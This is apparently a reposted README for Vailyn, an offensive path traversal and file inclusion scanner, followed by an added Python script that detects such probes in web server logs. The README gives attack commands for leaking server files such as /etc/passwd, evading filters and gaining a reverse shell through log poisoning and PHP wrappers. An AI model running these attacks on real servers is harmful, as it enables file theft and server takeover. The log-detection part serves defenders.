Vailyn - A Phased, Evasive Path Traversal + LFI Scanning & Exploitation Tool In Python

<h1 align="center"><a href="http://4.bp.blogspot.com/-2rdx0vfyq9k/YTVN7X0T73I/AAAAAAAAuI4/Dl9NXtf72WkZGlSn7yTU6K97vHQSLTlcACK4BGAYYCw/s1600/Vailyn_1_logo-700923.png"><img alt="Vailyn logo" border="0" height="400" id="BLOGGER_PHOTO_ID_7004590477845720946" src="http://4.bp.blogspot.com/-2rdx0vfyq9k/YTVN7X0T73I/AAAAAAAAuI4/Dl9NXtf72WkZGlSn7yTU6K97vHQSLTlcACK4BGAYYCw/w193-h400/Vailyn_1_logo-700923.png" width="193" /></a><br /> Vailyn <br /> </h1>
<p align="center">Phased Path Traversal &amp; LFI Attacks</p>
<blockquote> <p><strong>Vailyn 3.0</strong></p> <p>Since v3.0, Vailyn supports LFI PHP wrappers in Phase 1. Use <code>--lfi</code> to include them in the scan.</p> </blockquote>
<br /><span style="font-size: x-large;"><b>About</b></span><br />
<p>Vailyn is a multi-phased vulnerability analysis and exploitation tool for path traversal and file inclusion vulnerabilities. It is built to be as performant as possible and to offer a wide arsenal of filter evasion techniques.</p>
<br /><span style="font-size: x-large;"><b>How does it work?</b></span><br />
<p>Vailyn operates in two phases. First, it checks whether the vulnerability is present by trying to access /etc/passwd (or a user-specified file) with all of its evasive payloads. By analysing the responses, payloads that worked are separated from the others.</p>
<p>The user can then choose freely which of the working payloads to use; only these payloads are used in the second phase.</p>
<p>The second phase is the exploitation phase. Here it tries to leak all possible files from the server using a file dictionary and a directory dictionary. The search depth and the directory permutation level can be adapted via arguments. Optionally, it can download found files and save them in its loot folder. Alternatively, it will try to obtain a reverse shell on the system, letting the attacker gain full control over the server.</p>
<p>Right now, it supports multiple attack vectors: injection via query, path, cookie and POST data.</p>
<br /><span style="font-size: x-large;"><b>Why the phase separation?</b></span><br />
<p>The separation into several phases hugely improves the performance of the tool. In previous versions, every file-directory combination was checked with every payload. This resulted in a huge overhead, because payloads were re-used for every combination even when they did not work for the current page.</p>
<br /><span style="font-size: x-large;"><b>Installation</b></span><br />
<p>Recommended &amp; tested Python versions are 3.7+, but it should work fine with Python 3.5 &amp; 3.6, too. To install Vailyn, download the archive from the release tab, or perform</p>
<pre><code>$ git clone https://github.com/VainlyStrain/Vailyn
</code></pre>
<p>Once on your system, you'll need to install the Python dependencies.</p>
<br /><span style="font-size: large;"><b>Unix Systems</b></span><br />
<p>On Unix systems, it is sufficient to run</p>
<pre><code>$ pip install -r requirements.txt # --user
</code></pre>
<br /><span style="font-size: large;"><b>Windows</b></span><br />
<p>Some libraries Vailyn uses do not work well with Windows, or will fail to install.</p>
<p>If you use Windows, use <code>pip</code> to install the requirements listed in <code>Vailyn\requirements-windows.txt</code>.</p>
<p>If Twisted fails to install, there is an unofficial version available <a href="https://www.lfd.uci.edu/~gohlke/pythonlibs/#twisted" rel="nofollow" target="_blank" title="here">here</a>, which should build under Windows. Bear in mind that this is a third-party download, and its integrity isn't necessarily guaranteed. After it has installed successfully, running pip again on <code>requirements-windows.txt</code> should work.</p>
<br /><span style="font-size: large;"><b>Final Steps</b></span><br />
<p>If you want to fully use the reverse shell module, you'll need to have <code>sshpass</code>, <code>ncat</code> and <code>konsole</code> installed. Package names vary by Linux distribution. On Windows, you'll need to start the listener manually beforehand. If you don't like <code>konsole</code>, you can specify a different terminal emulator in <code>core/config.py</code>.</p>
<p>That's it! Fire Vailyn up by moving to its installation directory and performing</p>
<pre><code>$ python Vailyn -h
</code></pre>
<br /><span style="font-size: x-large;"><b>Usage</b></span><br />
<p>Vailyn has 3 mandatory arguments: <code>-v VIC</code>, <code>-a INT</code> and <code>-p2 TP P1 P2</code>. However, depending on <code>-a</code>, more arguments may be required.</p>
<pre><code>       | Vailyn |
    [ VainlyStrain ]

Vsynta Vailyn -v VIC -a INT -p2 TP P1 P2
       [-p PAM] [-i F] [-Pi VIC2]
       [-c C] [-n] [-d I J K]
       [-s T] [-t] [-L]
       [-l] [-P] [-A]

mandatory:
  -v VIC, --victim VIC  Target to attack, part 1 [pre-payload]
  -a INT, --attack INT  Attack type (int, 1-5, or A)

      A| Spider (all)       2| Path     5| POST Data, json
      P| Spider (partial)   3| Cookie
      1| Query Parameter    4| POST Data, plain

  -p2 TP P1 P2, --phase2 TP P1 P2
                        Attack in Phase 2, and needed parameters

┌[ Values ]─────────────┬────────────────────┐
│ TP      │ P1          │ P2                 │
├─────────┼─────────────┼────────────────────┤
│ leak    │ File Dict   │ Directory Dict     │
│ inject  │ IP Addr     │ Listening Port     │
│ implant │ Source File │ Server Destination │
└─────────┴─────────────┴────────────────────┘

additional:
  -p PAM, --param PAM   query parameter or POST data for --attack 1, 4, 5
  -i F, --check F       File to check for in Phase 1 (df: etc/passwd)
  -Pi VIC2, --vic2 VIC2 Attack Target, part 2 [post-payload]
  -c C, --cookie C      Cookie to append (in header format)
  -l, --loot            Download found files into the loot folder
  -d I J K, --depths I J K
                        depths (I: phase 1, J: phase 2, K: permutation level)
  -h, --help            show this help menu and exit
  -s T, --timeout T     Request Timeout; stable switch for Arjun
  -t, --tor             Pipe attacks through the Tor anonymity network
  -L, --lfi             Additionally use PHP wrappers to leak files
  -n, --nosploit        skip Phase 2 (does not need -p2 TP P1 P2)
  -P, --precise         Use exact depth in Phase 1 (not a range)
  -A, --app             Start Vailyn's Qt5 interface

develop:
  --debug               Display every path tried, even 404s.
  --version             Print program version and exit.
  --notmain             Avoid notify2 crash in subprocess call.

Info:
  to leak files using absolute paths:   -d 0 0 0
  to get a shell using absolute paths:  -d 0 X 0
</code></pre>
<p>Vailyn currently supports 5 attack vectors, and provides a crawler to automate all of them. The attack performed is identified by the <code>-a INT</code> argument.</p>
<pre><code>INT  attack
---- -------
1    query-based attack   (https://site.com?file=../../../)
2    path-based attack    (https://site.com/../../../)
3    cookie-based attack  (will grab the cookies for you)
4    plain post data      (ELEM1=VAL1&amp;ELEM2=../../../)
5    json post data       ({"file": "../../../"})
A    spider               fetch + analyze all URLs from site using all vectors
P    partial spider       fetch + analyze all URLs from site using only selected vectors
</code></pre>
<p>You also must specify a target to attack. This is done via <code>-v VIC</code> and <code>-Pi VIC2</code>, where <code>-v</code> is the part before the injection point, and <code>-Pi</code> the rest.</p>
<p>Example: if the final URL should look like <code>https://site.com/download.php?file=&lt;ATTACK&gt;&amp;param2=necessaryvalue</code>, you can specify <code>-v https://site.com/download.php</code> and <code>-Pi &amp;param2=necessaryvalue</code> (and <code>-p file</code>, since this is a query attack).</p>
<p>If you want to include PHP wrappers in the scan (like php://filter), use the <code>--lfi</code> argument. At the end of Phase 1, you'll be presented with an additional selection menu containing the wrappers that worked (if any).</p>
<p>If the attacked site is behind a login page, you can supply an authentication cookie via <code>-c COOKIE</code>. If you want to attack over Tor, use <code>--tor</code>.</p>
<br /><span style="font-size: large;"><b>Phase 1</b></span><br />
<p>This is the analysis phase, where working payloads are separated from the others.</p>
<p>By default, <code>/etc/passwd</code> is looked up. If the server is not running Linux, you can specify a custom file with <code>-i FILENAME</code>. Note that you must <strong>include subdirectories in FILENAME</strong>. You can modify the lookup depth with the first value of <code>-d</code> (default=8). If you want to use absolute paths, set the first depth to 0.</p>
<br /><span style="font-size: large;"><b>Phase 2</b></span><br />
<p>This is the exploitation phase, where Vailyn will try to leak as many files as possible, or gain a reverse shell using various techniques.</p>
<p>The depth of lookup in phase 2 (the maximal number of layers traversed back) is specified by the second value of the <code>-d</code> argument. The level of subdirectory permutation is set by the third value of <code>-d</code>.</p>
<p>If you attack with absolute paths and perform the leak attack, set all depths to 0. If you want to gain a reverse shell, make sure that the second depth is greater than 0.</p>
<p>By specifying <code>-l</code>, Vailyn will not only display files on the terminal, but also download and save the files into the loot folder.</p>
<p>If you want verbose output (display every response, not only found files), you can use <code>--debug</code>. Note that the output gets really messy; this is basically just a debugging aid.</p>
<p>To perform the bruteforce attack, you need to specify <code>-p2 leak FIL PATH</code>, where</p>
<ul> <li>FIL is a dictionary file containing <strong>filenames only</strong> (e.g. index.php)</li> <li>PATH is a dictionary file containing <strong>directory names only</strong>. Vailyn will handle directory permutation for you, so you'll need only one directory per line.</li> </ul>
<p>To gain a reverse shell by code injection, you can use <code>-p2 inject IP PORT</code>, where</p>
<ul> <li>IP is your listening IP</li> <li>PORT is the port you want to listen on.</li> </ul>
<blockquote> <p><strong>WARNING</strong></p> <p>Vailyn employs Log Poisoning techniques. Therefore, YOUR SPECIFIED IP WILL BE VISIBLE IN THE SERVER LOGS.</p> </blockquote>
<p>The techniques (only work for LFI inclusions):</p>
<ul> <li><code>/proc/self/environ</code> inclusion: only works on outdated servers</li> <li>Apache + Nginx log poisoning &amp; inclusion</li> <li>SSH log poisoning</li> <li>poisoned mail inclusion</li> <li>wrappers <ul> <li><code>expect://</code></li> <li><code>data://</code> (plain &amp; b64)</li> <li><code>php://input</code></li> </ul> </li> </ul>
<br /><span style="font-size: x-large;"><b>False Positive prevention</b></span><br />
<p>To distinguish real results from false positives, Vailyn does the following checks:</p>
<ul> <li>check the status code of the response</li> <li>check if the response is identical to one taken before attack start: this is useful e.g. when the server returns 200 but ignores the payload input, or returns a default page if the file is not found</li> <li>similar to #2, perform an additional check for query GET parameter handling (useful when the server returns an error that a needed parameter is missing)</li> <li>check for empty responses</li> <li>check if common error signatures are in the response content</li> <li>check if the payload is contained in the response: this is an additional check for the case where the server responds 200 for non-existing files and reflects the payload in a message (like <code>../../secret not found</code>)</li> <li>check if the entire response is contained in the init check response: useful when the server has a default include which disappears in case of 404</li> <li>for <code>-a 2</code>, perform an additional check if the response content matches the content from the server root URL</li> <li>REGEX check for <code>/etc/passwd</code> if using that as lookup file</li> </ul>
<br /><span style="font-size: x-large;"><b>Examples</b></span><br />
<ul>
<li><p>Simple Query attack, leaking files in Phase 2: <code>$ Vailyn -v "http://site.com/download.php" -a 1 -p2 leak dicts/files dicts/dirs -p file</code> --&gt; <code>http://site.com/download.php?file=../INJECT</code></p></li>
<li><p>Query attack, but I know a file <code>file.php</code> exists on exactly 2 levels above the inclusion point: <code>$ Vailyn -v "http://site.com/download.php" -a 1 -p2 leak dicts/files dicts/dirs -p file -i file.php -d 2 X X -P</code> This will shorten the duration of Phase 1 very much, since it's a targeted attack.</p></li>
<li><p>Simple Path attack: <code>$ Vailyn -v "http://site.com/" -a 2 -p2 leak dicts/files dicts/dirs</code> --&gt; <code>http://site.com/../INJECT</code></p></li>
<li><p>Path attack, but I need query parameters and tag: <code>$ Vailyn -v "http://site.com/" -a 2 -p2 leak dicts/files dicts/dirs -Pi "?token=X#title"</code> --&gt; <code>http://site.com/../INJECT?token=X#title</code></p></li>
<li><p>Simple Cookie attack: <code>$ Vailyn -v "http://site.com/cookiemonster.php" -a 3 -p2 leak dicts/files dicts/dirs</code> Will fetch cookies and let you select the cookie you want to poison</p></li>
<li><p>POST Plain Attack: <code>$ Vailyn -v "http://site.com/download.php" -a 4 -p2 leak dicts/files dicts/dirs -p "DATA1=xx&amp;DATA2=INJECT"</code> will infect DATA2 with the payload</p></li>
<li><p>POST JSON Attack: <code>$ Vailyn -v "http://site.com/download.php" -a 5 -p2 leak dicts/files dicts/dirs -p '{"file": "INJECT"}'</code></p></li>
<li><p>Attack, but target is behind login screen: <code>$ Vailyn -v "http://site.com/" -a 1 -p2 leak dicts/files dicts/dirs -c "sessionid=foobar"</code></p></li>
<li><p>Attack, but I want a reverse shell on port 1337: <code>$ Vailyn -v "http://site.com/download.php" -a 1 -p2 inject MY.IP.IS.XX 1337 # a high Phase 2 Depth is needed for log injection</code> (will start a ncat listener for you if on Unix)</p></li>
<li><p>Full automation in crawler mode: <code>$ Vailyn -v "http://root-url.site" -a A</code> <em>you can also specify other args, like cookie, depths, lfi &amp; lookup file here</em></p></li>
<li><p>Full automation, but Arjun needs <code>--stable</code>: <code>$ Vailyn -v "http://root-url.site" -a A -s ANY</code></p></li>
</ul>
<br /><span style="font-size: x-large;"><b>Demo</b></span><br />
<p><a href="https://asciinema.org/a/384813" rel="nofollow" target="_blank" title="Vailyn demo on asciinema"><img alt="A phased, evasive Path Traversal + LFI scanning &amp; exploitation tool in Python" src="https://asciinema.org/a/384813.svg" style="max-width: 100%;" /></a> Vailyn's Crawler analyzing a damn vulnerable web application. LFI Wrappers are not enabled.</p>
<p><a href="https://www.youtube.com/watch?v=rFlR_SHk9fc" rel="nofollow" target="_blank" title="GUI Demonstration (v2.2.1-5)">GUI Demonstration (v2.2.1-5)</a></p>
<br /><span style="font-size: x-large;"><b>Possible Issues</b></span><br />
<p>Found some false positives/negatives (or want to point out other bugs/improvements)? Please leave an issue!</p>
<br /><span style="font-size: x-large;"><b>Code of Conduct</b></span><br />
<blockquote> <p>Vailyn is provided as an offensive web application audit tool. It has built-in functionalities which can reveal potential vulnerabilities in web applications, which could be exploited maliciously.</p> <p><strong>THEREFORE, NEITHER THE AUTHOR NOR THE CONTRIBUTORS ARE RESPONSIBLE FOR ANY MISUSE OR DAMAGE DUE TO THIS TOOLKIT.</strong></p> <p>By using this software, the user undertakes to follow their local laws and not to attack someone else's system without explicit permission from the owner, or with malicious intent.</p> <p>In case of an infringement, only the end user who committed it is accountable for their actions.</p> </blockquote>
<br /><span style="font-size: x-large;"><b>Credits &amp; Copyright</b></span><br />
<blockquote> <p>Vailyn: Copyright © <a href="https://github.com/VainlyStrain" rel="nofollow" target="_blank" title="VainlyStrain">VainlyStrain</a></p> <p>Arjun: Copyright © <a href="https://github.com/s0md3v" rel="nofollow" target="_blank" title="s0md3v">s0md3v</a></p> </blockquote>
<p>Arjun is no longer distributed with Vailyn. Install its latest version via pip.</p>
<br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/VainlyStrain/Vailyn" rel="nofollow" target="_blank" title="Download Vailyn">Download Vailyn</a></span></b></div>
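<p>The traffic a scanner like this produces during Phase 1 (many encoded <code>../</code> variants aimed at <code>/etc/passwd</code>, plus PHP wrappers such as <code>php://filter</code>) is exactly what a defender wants to surface from web server logs. The following Python is an added example, not part of Vailyn or of this page: it parses a few constructed combined-format access-log lines, normalizes each path and query value, and flags traversal sequences, wrapper schemes and the lookup file. The normalization steps (repeated percent-decoding, folding backslashes, collapsing slash runs) are assumed common encodings, not a list taken from the page; the log lines, the <code>win.ini</code> Windows analogue and the function names are constructed for the example.</p>

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined log format (Apache/Nginx); only the fields needed for triage are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators. After normalization the traversal pattern covers "../", "..\" and
# strip-once bypasses such as "....//"; the wrapper schemes are the ones the page lists.
TRAVERSAL_RE = re.compile(r'(?:^|/)\.{2,}/')
WRAPPER_RE = re.compile(r'^(?:php|expect|data):', re.IGNORECASE)
# /etc/passwd is the page's default lookup file; win.ini is an assumed Windows analogue.
SENSITIVE_RE = re.compile(r'(?:^|/)etc/passwd(?:/|$)|(?:^|/)win\.ini$', re.IGNORECASE)

# Constructed sample log lines (not from the page): one benign download, four probes from
# the same client (plain, double-encoded, wrapper and backslash variants), and a benign
# path containing ".." that must not be flagged.
SAMPLE_LOG = r'''10.0.0.5 - - [01/Sep/2021:10:00:01 +0000] "GET /download.php?file=report.pdf HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Sep/2021:10:00:02 +0000] "GET /download.php?file=../../../../etc/passwd HTTP/1.1" 200 1854 "-" "python-requests/2.25"
10.0.0.9 - - [01/Sep/2021:10:00:03 +0000] "GET /download.php?file=..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1854 "-" "python-requests/2.25"
10.0.0.9 - - [01/Sep/2021:10:00:04 +0000] "GET /download.php?file=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 9000 "-" "python-requests/2.25"
10.0.0.9 - - [01/Sep/2021:10:00:05 +0000] "GET /..\..\..\windows\win.ini HTTP/1.1" 404 231 "-" "python-requests/2.25"
10.0.0.7 - - [01/Sep/2021:10:00:06 +0000] "GET /static/app..js HTTP/1.1" 200 42 "-" "Mozilla/5.0"
'''


def normalize(value, rounds=3):
    """Undo the encodings an evasive scanner layers on a value.

    Repeated percent-decoding handles double/triple encoding; backslashes are folded
    to forward slashes and runs of slashes collapsed, so "..\\..\\" and "....//" are
    judged by the same rule as "../../".
    """
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = value.replace('\\', '/')
    return re.sub(r'/+', '/', value)


def analyze_target(target):
    """Return the sorted list of indicator names found in one request target."""
    parts = urlsplit(target)
    values = [parts.path] + [v for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    reasons = set()
    for raw in values:
        value = normalize(raw)
        if TRAVERSAL_RE.search(value):
            reasons.add('traversal')
        if WRAPPER_RE.match(value):
            reasons.add('php-wrapper')
        if SENSITIVE_RE.search(value):
            reasons.add('sensitive-file')
    return sorted(reasons)


def scan_log(text):
    """Parse log lines and return one finding per request that carries an indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        reasons = analyze_target(m['target'])
        if reasons:
            findings.append({'ip': m['ip'], 'status': int(m['status']),
                             'target': m['target'], 'reasons': reasons})
    return findings


def offenders(findings, threshold=2):
    """IPs with at least `threshold` flagged requests, i.e. likely automated scanning."""
    counts = Counter(f['ip'] for f in findings)
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == '__main__':
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f"{f['ip']} {f['status']} {','.join(f['reasons'])} {f['target']}")
    print('repeat offenders:', offenders(hits))
```

<p>Note that the 404 line is still flagged: the status code tells you whether the probe succeeded, not whether someone is probing, which is why the page's own false-positive logic compares responses rather than trusting status codes alone. The <code>app..js</code> line shows why the traversal rule requires a following slash.</p>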

kitploit
#Filter Evasion#LFI Exploitation#LFI Shells#Local File Inclusion#Vailyn
